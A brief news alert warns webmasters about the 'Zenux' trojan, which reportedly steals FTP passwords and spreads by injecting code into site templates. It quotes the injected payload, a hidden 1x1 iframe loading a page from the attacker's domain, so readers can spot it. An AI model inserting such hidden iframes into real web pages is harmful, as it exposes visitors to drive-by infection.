TROJAN ALERT! "Zenux" Steals FTP Access Codes

Many web-pages on the Internet have been infected by a malicious program, called Zenux. This Trojan infects different sites and then spreads through these sites on PCs of the visitors.

Presumably, the Zenux attacks computers and steals all FTP access
logins and passwords, and starts copying itself onto web-pages through
their FTP-server connections. A chain reaction starts: the more
computers are infected, the more FTP access codes are stolen, and thus
more computers through respective web-site are infected.

Mainly Russian webmasters have faced this problem. And they still
don't know how to deal with the Trojan. It inserts a code into the
template of a site and could be seen, for example, as a small square 1
× 1 pixels in the lower left corner of the infected web-page. The piece
of an alien code one could see on a web-page should look like this:

<!-- ~ --><iframe src="http://zenux.info/info/index.php" width="1" height="1"><!-- ~ -->.

Even when the code is deleted, it comes back later on the page and
the only way to defeat the Trojan is to sweep the system clean with an
anti-virus program and change all FTP access codes.

The trial version of Kaspersky Internet Security Suite 7.0 has
stopped the script, initiated by this piece of code. It is unknown
whether other security programs are able to protect the PCs from this
Trojan. The least we could say is that NOD32 has let it through.

Powered by www.infoniac.com.